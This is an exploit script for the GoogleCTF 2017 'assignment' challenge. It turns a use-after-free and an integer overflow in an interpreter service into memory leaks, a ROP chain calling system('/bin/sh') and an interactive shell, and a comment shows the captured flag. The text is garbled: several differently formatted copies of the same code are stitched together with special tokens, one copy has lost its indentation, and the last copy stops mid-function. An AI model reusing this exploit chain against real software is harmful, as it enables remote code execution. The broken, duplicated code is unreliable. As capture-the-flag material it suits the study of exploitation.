    # Stage 4: read back 'p' to leak a pointer into the main binary.
    binary = readstrvar('p')
    binary = u64(binary) - 2769
    print_good('binary @ 0x{:x}'.format(binary))
    # 18446744073709551360 == 2**64 - 256: mask the low byte of input_buf.
    offset_to_ret = ret_addr - (input_buf & 18446744073709551360)
    print_good('offset to return address: 0x{:x}'.format(offset_to_ret))
    if offset_to_ret > 40 or offset_to_ret < 0:
        print_bad('Bad offset')
        return
    prop_name = p64(binary + 2761)[1]
    # The leaked address byte must form a valid identifier character.
    if prop_name < ord('A') or prop_name > ord('z'):
        print_bad('Bad propery name: {}'.format(prop_name))
        return
    prop_name = chr(prop_name)
    print_good('property name: {}'.format(prop_name))
    # Stage 5: place the ROP chain (newlines are forbidden by the protocol).
    payload = b'A' * 56
    payload += p64(pop_rdi)
    payload += p64(bin_sh)
    payload += p64(system)
    validate(payload, [b'\n'])
    evl(payload)
    evl('{}=42'.format(prop_name))
    # Pivot: overwrite the return address with an add-rsp gadget.
    payload = b'A' * offset_to_ret
    payload += p64(add_rsp_0x48)
    validate(payload, [b'\n'])
    evl(payload)
    time.sleep(0.5)
    interact()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def e(d):
    """Encode the given string instance using UTF-8 and return the bytes."""
    return bytes(d, 'UTF-8')
def d(d):
    """Decode the given bytes instance using UTF-8 and return the string."""
    return str(d, 'UTF-8')
def p32(d):
    """Return d packed as 32-bit unsigned integer (little endian).

    Raises struct.error if d does not fit into an unsigned 32-bit value.
    """
    return pack('<I', d)
def u32(d):
    """Return the number represented by d when interpreted as a 32-bit unsigned integer (little endian).

    Raises struct.error unless d is exactly 4 bytes long.
    """
    return unpack('<I', d)[0]
def p64(d):
    """Return d packed as 64-bit unsigned integer (little endian).

    Raises struct.error if d does not fit into an unsigned 64-bit value.
    """
    return pack('<Q', d)
def u64(d):
    """Return the number represented by d when interpreted as a 64-bit unsigned integer (little endian).

    Raises struct.error unless d is exactly 8 bytes long.
    """
    return unpack('<Q', d)[0]
def print_good(msg):
    """Print a success message in bold."""
    prefix = ansi(Term.BOLD) + '[+] '
    print(prefix + msg + ansi(Term.CLEAR))
def print_bad(msg):
    """Print an error/failure message, colored magenta."""
    prefix = ansi(Term.COLOR_MAGENTA) + '[-] '
    print(prefix + msg + ansi(Term.CLEAR))
def print_info(msg):
    """Print a neutral informational message."""
    sys.stdout.write('[*] ' + msg + '\n')
def bytes_and_strings_are_cool(func):
    """Decorator to encode arguments that are string instances.

    Positional and keyword arguments of type str are UTF-8 encoded to bytes
    before the wrapped function is called; all other values pass through
    unchanged.
    """
    def inner(*args, **kwargs):
        nargs = tuple(e(arg) if isinstance(arg, str) else arg for arg in args)
        # BUG FIX: the original built nkwargs with map(lambda k, v: ..., kwargs),
        # but iterating a dict yields only keys, so the two-argument lambda
        # raised TypeError whenever a keyword argument was passed. Iterate
        # over the items instead.
        nkwargs = {k: e(v) if isinstance(v, str) else v for k, v in
                   kwargs.items()}
        return func(*nargs, **nkwargs)
    return inner
def validate(data, badchars):
    """Assert that no badchar occurs in data."""
    for bad in badchars:
        assert bad not in data
def is_printable(b):
    """Return true if the given byte is a printable ASCII character."""
    # Inlined equivalent of e(string.printable): membership test against the
    # UTF-8 encoding of string.printable (pure ASCII).
    return b in string.printable.encode('UTF-8')
def hexdump(data):
    """Return a hexdump of the given data. Similar to what `hexdump -C` produces."""
    # Characters rendered verbatim in the right-hand ASCII column.
    printable = (
        b' 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz`~!@#$%^&*()-_=+[]{}\\|\'";:/?.,<>'
        )
    out = []
    for off in range(0, len(data), 16):
        chunk = data[off:off + 16]
        cells = ['{:02x}'.format(byte) for byte in chunk]
        left = ' '.join(cells[:8])
        right = ' '.join(cells[8:])
        text = ''.join(chr(byte) if byte in printable else '.' for byte in chunk)
        out.append('{:08x} {:23} {:23} |{}|'.format(off, left, right, text))
    return '\n'.join(out)
class Term:
    """ANSI terminal SGR escape-code fragments."""
    # Foreground color parameter codes.
    COLOR_BLACK = '30'
    COLOR_RED = '31'
    COLOR_GREEN = '32'
    COLOR_BROWN = '33'
    COLOR_BLUE = '34'
    COLOR_MAGENTA = '35'
    COLOR_CYAN = '36'
    COLOR_WHITE = '37'
    # Text attribute parameter codes.
    CLEAR = '0'  # reset all attributes
    UNDERLINE = '4'
    BOLD = '1'
    # CSI prefix (ESC '[') and SGR suffix that bracket the parameter list.
    ESCAPE_START = '\x1b['
    ESCAPE_END = 'm'
def ansi(*args):
    """Construct an ANSI terminal escape code from SGR parameter strings."""
    return '{}{}{}'.format(Term.ESCAPE_START, ';'.join(args), Term.ESCAPE_END)
class DisconnectException(Exception):
    """Raised when the remote end closes the connection."""
    pass
class Pattern:
    """De-Bruijn sequence generator.

    Produces a pattern in which every length-n subsequence is unique, so the
    position of a value observed in a crash can be recovered with offset().
    """
    alphabet = string.digits + string.ascii_letters

    def __init__(self, length):
        # Pick the smallest subsequence length n whose De Bruijn sequence
        # over the alphabet is long enough for the requested pattern.
        if length <= len(self.alphabet):
            self._seq = self.alphabet[:length]
        elif length <= len(self.alphabet) ** 2:
            self._seq = self._generate(2)[:length]
        elif length <= len(self.alphabet) ** 3:
            self._seq = self._generate(3)[:length]
        elif length <= len(self.alphabet) ** 4:
            self._seq = self._generate(4)[:length]
        else:
            raise Exception('Pattern length is way too large')

    def _generate(self, n):
        """Generate a De Bruijn sequence for subsequences of length n."""
        k = len(self.alphabet)
        a = [0] * k * n
        sequence = []

        def db(t, p):
            # Standard recursive De Bruijn construction via Lyndon words.
            if t > n:
                if n % p == 0:
                    sequence.extend(a[1:p + 1])
            else:
                a[t] = a[t - p]
                db(t + 1, p)
                for j in range(a[t - p] + 1, k):
                    a[t] = j
                    db(t + 1, t)
        db(1, 1)
        return ''.join(self.alphabet[i] for i in sequence)

    def bytes(self):
        """Return this sequence as bytes."""
        return e(self._seq)

    def __str__(self):
        """Return this sequence as string."""
        return self._seq

    @bytes_and_strings_are_cool
    def offset(self, needle):
        """Returns the index of 'needle' in this sequence.

        'needle' should be of type string or bytes. If an integer is provided
        it will be treated as 32-bit or 64-bit little endian number, depending
        on its bit length.

        Raises ValueError if the needle is absent or occurs more than once.
        """
        if isinstance(needle, int):
            if needle.bit_length() <= 32:
                needle = p32(needle)
            else:
                needle = p64(needle)
        # BUG FIX: the decorator converts str needles to bytes, and ints are
        # packed to bytes above, but self._seq is a str -- the original only
        # decoded in the int branch, so str/bytes needles raised TypeError.
        # Decode unconditionally before searching.
        needle = d(needle)
        idx = self._seq.index(needle)
        if self._seq[idx + len(needle):].find(needle) != -1:
            raise ValueError('Multiple occurrences found!')
        return idx
class Channel:
    """Convenience wrapper around a socket.

    Buffers incoming data internally and can pretty-print all traffic:
    outgoing data in one color, incoming in another, with non-printable
    bytes rendered as highlighted hex.
    """
    OUTGOING_COLOR = Term.COLOR_RED
    INCOMING_COLOR = Term.COLOR_BLUE

    def __init__(self, sock, verbose):
        # sock: a connected socket; verbose: echo traffic via _prettyprint().
        self._s = sock
        self._verbose = verbose
        self._buf = bytearray()  # received-but-not-yet-consumed bytes

    def _prettyprint(self, data, outgoing):
        """Prettyprint the given data.

        This does the following: All data that is valid ASCII is colorized according to the direction of the traffic.
        Everything else is converted to hex, then printed in bold and underline for visibility.
        Only ASCII is supported as of now. This might be the better choice anyway since otherwise valid UTF-8 might be
        detected in arbitrary binary streams.
        """
        TEXT = 0
        BINARY = 1
        # Heuristic thresholds: X = max length of a short text run that is
        # still rendered as hex when it follows binary data; Y and Z control
        # when the repeated-character tail of a long text run is split off.
        X = 4
        Y = 16
        Z = 2
        color = self.OUTGOING_COLOR if outgoing else self.INCOMING_COLOR
        # Tag every byte as printable text or binary.
        parts = []
        curr = ''  # NOTE(review): unused; kept as-is
        for b in data:
            if is_printable(b):
                parts.append((TEXT, b))
            else:
                parts.append((BINARY, b))
        # Merge consecutive bytes carrying the same tag into runs.
        i = 0
        mergedparts = []
        while i < len(parts):
            t = parts[i][0]
            arr = [parts[i][1]]
            j = i + 1
            while j < len(parts) and parts[j][0] == t:
                arr.append(parts[j][1])
                j += 1
            i = j
            extra = []
            # For a long text run that is not at the very end, split off a
            # long run of one repeated character near its tail and reclassify
            # it as binary (likely padding rather than real text).
            if t == TEXT and len(arr) > Y and i < len(parts) - 1:
                mid = len(arr) - Z - 1
                start, end = mid, mid
                char = arr[mid]
                while start >= 0 and arr[start] == char:
                    start -= 1
                while end < len(arr) and arr[end] == char:
                    end += 1
                if end - start >= Y + 2 and end < len(parts):
                    extra = arr[end:]
                    arr = arr[:end]
            mergedparts.append((t, bytes(arr)))
            if extra:
                mergedparts.append((BINARY, bytes(extra)))
        parts = mergedparts
        # Render: text runs in plain color, binary runs as bold/underlined hex.
        buf = ''
        last = None
        for tag, value in parts:
            # Short text sandwiched inside binary reads better as hex.
            if tag == TEXT and len(value) <= X and last == BINARY:
                tag = BINARY
            if tag == TEXT:
                buf += ansi(Term.CLEAR) + ansi(color)
            else:
                buf += ansi(color, Term.BOLD, Term.UNDERLINE)
                value = hexlify(value)
            buf += d(value)
            last = tag
        buf += ansi(Term.CLEAR)
        print(buf, end='')
        sys.stdout.flush()

    def setVerbose(self, verbose):
        """Set verbosity of this channel."""
        self._verbose = verbose

    def recv(self, n=4096):
        """Return up to n bytes of data from the remote end.

        Buffers incoming data internally.
        NOTE: You probably shouldn't be using this method. Use one of the other recvX methods instead.
        """
        if len(self._buf) < n:
            buf = self._s.recv(65536)
            # Empty recv() result with an empty buffer means EOF.
            if not buf and not self._buf:
                raise DisconnectException('Server disconnected.')
            if self._verbose:
                self._prettyprint(buf, False)
            self._buf += buf
        # Serve at most n bytes from the internal buffer.
        buf = self._buf[:n]
        self._buf = self._buf[n:]
        return buf

    def recvn(self, n):
        """Return exactly n bytes of data from the remote end."""
        data = []
        while len(data) != n:
            data.append(self.recv(1))
        return b''.join(data)

    @bytes_and_strings_are_cool
    def recvtil(self, delim):
        """Read data from the remote end until delim is found in the data.

        The first occurrence of delim is included in the returned buffer.
        """
        buf = b''
        while not delim in buf:
            buf += self.recv(1)
        return buf

    def recvregex(self, regex):
        """Receive incoming data until it matches the given regex.

        Returns the match object.
        IMPORTANT: Since the data is coming from the network, it's usually
        a bad idea to use a regex such as 'addr: 0x([0-9a-f]+)' as this function
        will return as soon as 'addr: 0xf' is read. Instead, make sure to
        end the regex with a known sequence, e.g. use 'addr: 0x([0-9a-f]+)\\n'.
        """
        if isinstance(regex, str):
            regex = re.compile(regex)
        buf = ''
        match = None
        while not match:
            buf += d(self.recv(1))
            match = regex.search(buf)
        return match

    def recvline(self):
        """Receive and return a line from the remote end.

        The trailing newline character will be included in the returned buffer.
        """
        return self.recvtil('\n')

    def send(self, buf):
        """Send all data in buf to the remote end."""
        if self._verbose:
            self._prettyprint(buf, True)
        self._s.sendall(buf)

    def sendnum(self, n):
        """Send the string representation of n followed by a newline character."""
        self.sendline(str(n))

    @bytes_and_strings_are_cool
    def sendline(self, l):
        """Append a newline to l and send everything to the remote end."""
        self.send(l + b'\n')

    def interact(self):
        """Interact with the remote end: connect stdout and stdin to the socket."""
        self._verbose = False  # received data is written to stdout below anyway
        try:
            while True:
                # Block until local stdin or the socket is readable.
                available, _, _ = select.select([sys.stdin, self._s], [], [])
                for src in available:
                    if src == sys.stdin:
                        # read1(): return available bytes without blocking for more.
                        data = sys.stdin.buffer.read1(1024)
                        self.send(data)
                    else:
                        data = self.recv(4096)
                        sys.stdout.buffer.write(data)
                        sys.stdout.flush()
        except KeyboardInterrupt:
            return
        except DisconnectException:
            print_info('Server disconnected.')
            return
def telnet(shell='/bin/bash'):
"""Telnet emulation.
Opens a PTY on the remote end and connects the master side to the socket.
Then spawns a shell connected to the slave end and puts the controlling TTY
on the local machine into raw mode.
Result: Something similar to a telnet/(plaintext)ssh session.
Vim, htop, su, less, etc. will work with this.
!!! This function only works if the channel is connected to a shell !!!
"""
assert sys.stdin.isatty()
c.setVerbose(False)
code = "import pty; pty.spawn(['{}', '-i'])".format(shell)
sendline('python -c "{}"; exit'.format(code))
time.sleep(0.5)
old_settings = termios.tcgetattr(sys.stdin.fileno())
tty.setraw(sys.stdin)
cols, rows = os.get_terminal_size(sys.stdin.fileno())
sendline('stty rows {} cols {}; echo READY'.format(rows, cols))
recvtil('READY\r\n')
recvtil('READY\r\n')
interact()
termios.tcsetattr(sys.stdin.fileno(), termios.TCSADRAIN, old_settings)
def send(b):
c.send(b)
def sendline(l):
c.sendline(l)
def sendnum(n):
c.sendnum(n)
def recv(n):
return c.recv(n)
def recvtil(delim):
return c.recvtil(delim)
def recvn(n):
return c.recvn(n)
def recvline():
return c.recvline()
def recvregex(r):
return c.recvregex(r)
def interact():
c.interact()
<|reserved_special_token_0|>
def evl(code):
sendline(code)
def readvar(name):
evl('=')
recvtil('Bad token: 0-1\n> ')
evl(name)
response = recvtil('> ')
return response.split(b'\n')[0]
def readintvar(name):
return int(d(readvar(name)))
def readstrvar(name):
return readvar(name)[1:-1]
def heapleak():
"""Free the lhs and rhs values during add_assign. ..."""
for i in range(16):
evl('{}'.format(i))
evl('h=0+0')
return readintvar('h') & 18446744073709547520
def gc(remaining):
"""Trigger gargabe collection"""
for i in range(remaining):
evl('{}'.format(i))
def leak(addr, length):
"""Leaks process memory by abusing the UAF to temporarily inject a fake string."""
fake_str_addr = heap_base + 176
fake_str = p64(length) + p64(addr)
evl(b'l="' + fake_str + b'"')
for i in range(15):
evl('{}'.format(i))
evl('a={}+x'.format(fake_str_addr))
gc(16)
return readstrvar('a')[0:length]
def leak2(addr, length):
"""Same as above, but different offsets..."""
fake_str_addr = heap_base + 368
fake_str = p64(length) + p64(addr)
evl(b'l="' + fake_str + b'"')
for i in range(12):
evl('{}'.format(i))
evl('a={}+x'.format(fake_str_addr))
return readstrvar('a')[0:length]
def pwn():
global heap_base
recvtil('>')
evl('x="XXXXXXXXXXXXXXXX"')
heap_base = heapleak()
print_good('Heap base @ 0x{:x}'.format(heap_base))
evl('"{}"'.format('A' * 256))
gc(20 - 4)
heap_mem = leak(heap_base, 4096)
for i in range(0, len(heap_mem) - 16, 8):
flink = u64(heap_mem[i:i + 8])
blink = u64(heap_mem[i + 8:i + 16])
if (abs(flink - heap_base) > 65536 and flink > 139637976727552 and
flink < 140737488355328 and blink > 139637976727552 and blink <
140737488355328):
break
else:
print_bad('No freelist pointers found :(')
return
libc = flink - 3938600
print_good('libc @ 0x{:x}'.format(libc))
env_ptr = u64(leak2(libc + 3949728, 8))
print_good('stack @ 0x{:x}'.format(env_ptr))
system = libc + 288144
bin_sh = libc + 1573123
pop_rdi = libc + 142234
pop_rsi = libc + 149637
pop_rdx = libc + 7054
add_rsp_0x48 = libc + 1006475
print_good('/bin/sh @ 0x{:x}'.format(bin_sh))
input_buf = env_ptr - 808
print_good('input_buf @ 0x{:x}'.format(input_buf))
ret_addr = env_ptr - 808 - 8
print_good('return address @ 0x{:x}'.format(ret_addr))
evl('l.a=x')
evl('h.a=x')
evl('a.a=x')
evl('b.a=x')
evl('c.a=x')
evl('d.a=x')
evl('e.a=x')
evl('f.a=x')
for i in range(9):
evl('"{}"'.format('A' * 16))
evl('1337')
for o in ['l', 'a', 'h', 'a', 'b', 'c', 'd', 'e', 'f']:
for p in ALPHABET:
evl('{}.{}=x'.format(o, p))
for i in range(6):
evl('1337')
for i in 'ghijk':
evl('{}=x'.format(i))
fake_str = p64(18446744073709551615 - 15 - (384 - 16)) + p64(71748523475265
) + b'D' * 240
evl(b'n="' + fake_str + b'"')
payload = b'\x00' * 64 + p64(ord('p')) + p64(input_buf + 16 + 256) + p64(
input_buf - 7)
payload += b'\x00' * (384 - len(payload))
evl(b'o="' + payload + b'"')
fake_str_addr = heap_base + 7808
evl('p=o+{}'.format(fake_str_addr))
payload = b'A' * 256
payload += p64(1) + p64(input_buf + 16 + 256 + 24) + p64(0)
payload += p64(8) + p64(ret_addr)
evl(payload)
binary = readstrvar('p')
binary = u64(binary) - 2769
print_good('binary @ 0x{:x}'.format(binary))
offset_to_ret = ret_addr - (input_buf & 18446744073709551360)
print_good('offset to return address: 0x{:x}'.format(offset_to_ret))
if offset_to_ret > 40 or offset_to_ret < 0:
print_bad('Bad offset')
return
prop_name = p64(binary + 2761)[1]
if prop_name < ord('A') or prop_name > ord('z'):
print_bad('Bad propery name: {}'.format(prop_name))
return
prop_name = chr(prop_name)
print_good('property name: {}'.format(prop_name))
payload = b'A' * 56
payload += p64(pop_rdi)
payload += p64(bin_sh)
payload += p64(system)
validate(payload, [b'\n'])
evl(payload)
evl('{}=42'.format(prop_name))
payload = b'A' * offset_to_ret
payload += p64(add_rsp_0x48)
validate(payload, [b'\n'])
evl(payload)
time.sleep(0.5)
interact()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
#!/usr/bin/env python3
#
# Exploit for "assignment" of GoogleCTF 2017
#
# CTF-quality exploit...
#
# Slightly simplified and shortened explanation:
#
# The bug is a UAF of one or both values during add_assign() if a GC is
# triggered during allocate_value(). The exploit first abuses this to leak a
# pointer into the heap by confusing an Integer Value with a Property. It then
# abuses the UAF differently to create a fake String instance which is
# concatenated and returned. By faking a String in the heap, we can read
# arbitrary memory. We leak the addresses of libc and the stack. Next the
# exploit does some heap feng shui, then fakes a string with length 0xffffffXX,
# which triggers an integer overflow during string_concat(). This gives us a
# heap-based buffer overflow. With that we first corrupt a Property to point
# into the stack, then overwrite the length of the fake string with 0 to stop
# the memcpy. We leak the address of the binary from the return address. Next
# we write a value to the fake property. This writes a pointer to the heap into
# the stack. With that we corrupt only the first byte of the input buffer
# pointer so it now points further down into the stack. The next call to
# readline() by the application then writes into the stack frame of readline()
# and ultimately overwrites the return address => we get ROP:
#
# [+] Heap base @ 0x55cd3d465000
# [+] libc @ 0x7f7ea1f79000
# [+] stack @ 0x7ffcf044f448
# [+] /bin/sh @ 0x7f7ea20f9103
# [+] input_buf @ 0x7ffcf044f120
# [+] return address @ 0x7ffcf044f118
# [+] binary @ 0x55cd3c696000
# [+] offset to return address: 0x18
# [+] property name: j
# id
# uid=1337(user) gid=1337(user) groups=1337(user)
# ls
# assignment
# flag.txt
# cat flag.txt
# CTF{d0nT_tHrOw_0u7_th1nG5_yoU_5ti11_u53}
#
# Author: Samuel <saelo> Groß
#
import socket
import termios
import tty
import time
import sys
import select
import os
import re
import telnetlib
import string
from struct import pack, unpack
from binascii import hexlify, unhexlify
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Global Config
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#TARGET = ('localhost', 4444)
# Remote endpoint of the vulnerable service: (host, port).
TARGET = ('assignment.ctfcompetition.com', 1337)
# Enable "wireshark" mode, pretty prints all incoming and outgoing network traffic.
NETDEBUG = False
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Encoding and Packing
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
def e(d):
    """UTF-8 encode the given string and return the resulting bytes."""
    encoded = d.encode(encoding='UTF-8')
    return encoded
def d(d):
    """UTF-8 decode the given bytes and return the resulting string."""
    decoded = d.decode(encoding='UTF-8')
    return decoded
def p32(d):
    """Pack d into 4 little-endian bytes (32-bit unsigned integer)."""
    packed = pack('<I', d)
    return packed
def u32(d):
    """Interpret d as a little-endian 32-bit unsigned integer and return it."""
    value, = unpack('<I', d)
    return value
def p64(d):
    """Pack d into 8 little-endian bytes (64-bit unsigned integer)."""
    packed = pack('<Q', d)
    return packed
def u64(d):
    """Interpret d as a little-endian 64-bit unsigned integer and return it."""
    value, = unpack('<Q', d)
    return value
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Output
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
def print_good(msg):
    """Print msg as a bold success line with a '[+]' prefix."""
    prefix = ansi(Term.BOLD) + '[+] '
    print(prefix + msg + ansi(Term.CLEAR))
def print_bad(msg):
    """Print msg as a magenta failure line with a '[-]' prefix."""
    prefix = ansi(Term.COLOR_MAGENTA) + '[-] '
    print(prefix + msg + ansi(Term.CLEAR))
def print_info(msg):
    """Print msg as an informational line with a '[*]' prefix."""
    print(''.join(('[*] ', msg)))
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Misc.
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
def bytes_and_strings_are_cool(func):
    """Decorator that UTF-8 encodes every str argument to bytes.

    Positional arguments and keyword-argument values that are str
    instances are encoded before the call; everything else is passed
    through untouched, so the wrapped function only ever sees bytes
    (or non-string objects).
    """
    def inner(*args, **kwargs):
        # Encode str positional arguments, leave everything else alone.
        nargs = tuple(arg.encode('UTF-8') if isinstance(arg, str) else arg
                      for arg in args)
        # Bug fix: the old code did dict(map(lambda k, v: ..., kwargs)),
        # which iterates over the *keys only* and raised TypeError as soon
        # as any keyword argument was actually supplied. Iterate items().
        nkwargs = {k: (v.encode('UTF-8') if isinstance(v, str) else v)
                   for k, v in kwargs.items()}
        return func(*nargs, **nkwargs)
    return inner
def validate(data, badchars):
    """Assert that none of the given badchars occurs anywhere in data."""
    for bad in badchars:
        assert bad not in data
def is_printable(b):
    """Return True if the byte value b is a printable ASCII character."""
    return b in string.printable.encode('UTF-8')
def hexdump(data):
    """Return a hexdump of the given data. Similar to what `hexdump -C` produces."""
    printable = b' 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz`~!@#$%^&*()-_=+[]{}\\|\'";:/?.,<>'
    rows = []
    # Walk the data 16 bytes at a time; each row shows offset, two 8-byte
    # hex groups and the ASCII rendering of the chunk.
    for offset in range(0, len(data), 16):
        chunk = data[offset:offset + 16]
        hexpairs = ['{:02x}'.format(byte) for byte in chunk]
        left = ' '.join(hexpairs[:8])
        right = ' '.join(hexpairs[8:])
        text = ''.join(chr(byte) if byte in printable else '.' for byte in chunk)
        rows.append('{:08x}  {:23}  {:23}  |{}|'.format(offset, left, right, text))
    return '\n'.join(rows)
class Term:
    """ANSI/VT100 SGR escape-code fragments used for colored terminal output."""
    # Foreground color parameters (SGR codes 30-37).
    COLOR_BLACK = '30'
    COLOR_RED = '31'
    COLOR_GREEN = '32'
    COLOR_BROWN = '33'
    COLOR_BLUE = '34'
    COLOR_MAGENTA = '35'
    COLOR_CYAN = '36'
    COLOR_WHITE = '37'
    # Attribute parameters.
    CLEAR = '0'
    UNDERLINE = '4'
    BOLD = '1'
    # Escape-sequence framing: ESC [ <params> m
    ESCAPE_START = '\033['
    ESCAPE_END = 'm'
# TODO rename to style and append Term.Clear ?
def ansi(*args):
    """Construct an ANSI terminal escape code from the given SGR parameters."""
    return Term.ESCAPE_START + ';'.join(args) + Term.ESCAPE_END
class DisconnectException(Exception):
    """Raised when the remote end closes the connection."""
    pass
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Pattern Generation
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
class Pattern:
    """De-Bruijn sequence generator.

    Produces a pattern string in which every n-character subsequence occurs
    only once, so a value recovered from a crashed process (register, stack
    slot, ...) can be mapped back to its offset in the input via offset().
    """
    alphabet = string.digits + string.ascii_letters

    def __init__(self, length):
        # Pick the smallest subsequence width n (up to 4) such that
        # len(alphabet)**n covers the requested length.
        if length <= len(self.alphabet):
            self._seq = self.alphabet[:length]
        elif length <= len(self.alphabet) ** 2:
            self._seq = self._generate(2)[:length]
        elif length <= len(self.alphabet) ** 3:
            self._seq = self._generate(3)[:length]
        elif length <= len(self.alphabet) ** 4:
            self._seq = self._generate(4)[:length]
        else:
            # Fixed typo in the error message ("way to large").
            raise Exception("Pattern length is way too large")

    def _generate(self, n):
        """Generate a De Bruijn sequence for subsequences of length n."""
        # Standard recursive construction, see
        # https://en.wikipedia.org/wiki/De_Bruijn_sequence
        k = len(self.alphabet)
        a = [0] * k * n
        sequence = []

        def db(t, p):
            if t > n:
                if n % p == 0:
                    sequence.extend(a[1:p + 1])
            else:
                a[t] = a[t - p]
                db(t + 1, p)
                for j in range(a[t - p] + 1, k):
                    a[t] = j
                    db(t + 1, t)
        db(1, 1)
        return ''.join(self.alphabet[i] for i in sequence)

    def bytes(self):
        """Return this sequence as bytes."""
        return e(self._seq)

    def __str__(self):
        """Return this sequence as string."""
        return self._seq

    @bytes_and_strings_are_cool
    def offset(self, needle):
        """Returns the index of 'needle' in this sequence.

        'needle' should be of type string or bytes. If an integer is provided
        it will be treated as 32-bit or 64-bit little endian number, depending
        on its bit length.

        Raises ValueError if the needle is absent or occurs more than once.
        """
        if isinstance(needle, int):
            if needle.bit_length() <= 32:
                needle = p32(needle)
            else:
                needle = p64(needle)
        needle = d(needle)
        idx = self._seq.index(needle)
        if self._seq[idx + len(needle):].find(needle) != -1:
            # Fixed typo in the error message ("occurances").
            raise ValueError("Multiple occurrences found!")
        return idx
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Network
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
class Channel:
    """Convenience wrapper around a socket.

    Buffers incoming data, optionally pretty-prints all traffic for
    debugging, and provides the usual recv*/send* helpers on top of a
    plain TCP socket.
    """
    # ANSI colors used by _prettyprint for each traffic direction.
    OUTGOING_COLOR = Term.COLOR_RED
    INCOMING_COLOR = Term.COLOR_BLUE
    def __init__(self, sock, verbose):
        self._s = sock
        self._verbose = verbose
        # Data received from the socket but not yet consumed by a recv* call.
        self._buf = bytearray()
    def _prettyprint(self, data, outgoing):
        """Prettyprint the given data.
        This does the following: All data that is valid ASCII is colorized according to the direction of the traffic.
        Everything else is converted to hex, then printed in bold and underline for visibility.
        Only ASCII is supported as of now. This might be the better choice anyway since otherwise valid UTF-8 might be
        detected in arbitrary binary streams.
        """
        TEXT = 0
        BINARY = 1
        # Various Thresholds for the heuristics below
        X = 4
        Y = 16
        Z = 2
        color = self.OUTGOING_COLOR if outgoing else self.INCOMING_COLOR
        # Step 1: Tag every byte of the input stream with it's detected type.
        parts = []
        curr = ''
        for b in data:
            if is_printable(b):
                parts.append((TEXT, b))
            else:
                parts.append((BINARY, b))
        # Step 2: Merge neighboring bytes of the same type and convert the sequences to type bytes.
        i = 0
        mergedparts = []
        while i < len(parts):
            t = parts[i][0]
            arr = [parts[i][1]]
            j = i+1
            while j < len(parts) and parts[j][0] == t:
                arr.append(parts[j][1])
                j += 1
            i = j
            # Heuristic: If there are Y ASCII bytes with the same value followed by Z ASCII bytes followed by binary data, treat the Z bytes as binary as well.
            extra = []
            if t == TEXT and len(arr) > Y and i < len(parts) - 1:
                mid = len(arr) - Z - 1
                start, end = mid, mid
                char = arr[mid]
                while start >= 0 and arr[start] == char:
                    start -= 1
                while end < len(arr) and arr[end] == char:
                    end += 1
                # start and end point outside the range of equal-valued characters now.
                if end - start >= Y+2 and end < len(parts):
                    extra = arr[end:]
                    arr = arr[:end]
            mergedparts.append((t, bytes(arr)))
            if extra:
                mergedparts.append((BINARY, bytes(extra)))
        parts = mergedparts
        # Step 3: Merge all parts and prepend the ansi terminal escape sequences for the given type.
        buf = ''
        last = None
        for tag, value in parts:
            # Heuristic: If there is an ASCII sequence of X bytes or less surrounded by binary data, treat those as binary as well.
            if tag == TEXT and len(value) <= X and last == BINARY:
                tag = BINARY
            if tag == TEXT:
                buf += ansi(Term.CLEAR) + ansi(color)
            else:
                buf += ansi(color, Term.BOLD, Term.UNDERLINE)
                value = hexlify(value)
            buf += d(value)
            last = tag
        buf += ansi(Term.CLEAR)
        # Step 4: Print :)
        print(buf, end='')
        sys.stdout.flush()
    def setVerbose(self, verbose):
        """Set verbosity of this channel."""
        self._verbose = verbose
    def recv(self, n=4096):
        """Return up to n bytes of data from the remote end.
        Buffers incoming data internally.
        NOTE: You probably shouldn't be using this method. Use one of the other recvX methods instead.
        """
        if len(self._buf) < n:
            # Read a large chunk at once; anything beyond n stays buffered.
            buf = self._s.recv(65536)
            if not buf and not self._buf:
                raise DisconnectException("Server disconnected.")
            if self._verbose:
                self._prettyprint(buf, False)
            self._buf += buf
        # This code also works if n > len(self._buf)
        buf = self._buf[:n]
        self._buf = self._buf[n:]
        return buf
    def recvn(self, n):
        """Return exactly n bytes of data from the remote end."""
        data = []
        while len(data) != n:
            data.append(self.recv(1))
        return b''.join(data)
    @bytes_and_strings_are_cool
    def recvtil(self, delim):
        """Read data from the remote end until delim is found in the data.
        The first occurrence of delim is included in the returned buffer.
        """
        buf = b''
        # TODO maybe not make this O(n**2)...
        while not delim in buf:
            buf += self.recv(1)
        return buf
    def recvregex(self, regex):
        """Receive incoming data until it matches the given regex.
        Returns the match object.
        IMPORTANT: Since the data is coming from the network, it's usually
        a bad idea to use a regex such as 'addr: 0x([0-9a-f]+)' as this function
        will return as soon as 'addr: 0xf' is read. Instead, make sure to
        end the regex with a known sequence, e.g. use 'addr: 0x([0-9a-f]+)\\n'.
        """
        if isinstance(regex, str):
            regex = re.compile(regex)
        buf = ''
        match = None
        while not match:
            buf += d(self.recv(1))
            match = regex.search(buf)
        return match
    def recvline(self):
        """Receive and return a line from the remote end.
        The trailing newline character will be included in the returned buffer.
        """
        return self.recvtil('\n')
    def send(self, buf):
        """Send all data in buf to the remote end."""
        if self._verbose:
            self._prettyprint(buf, True)
        self._s.sendall(buf)
    def sendnum(self, n):
        """Send the string representation of n followed by a newline character."""
        self.sendline(str(n))
    @bytes_and_strings_are_cool
    def sendline(self, l):
        """Append a newline to l and send everything to the remote end."""
        self.send(l + b'\n')
    def interact(self):
        """Interact with the remote end: connect stdout and stdin to the socket."""
        # TODO maybe use this at some point: https://docs.python.org/3/library/selectors.html
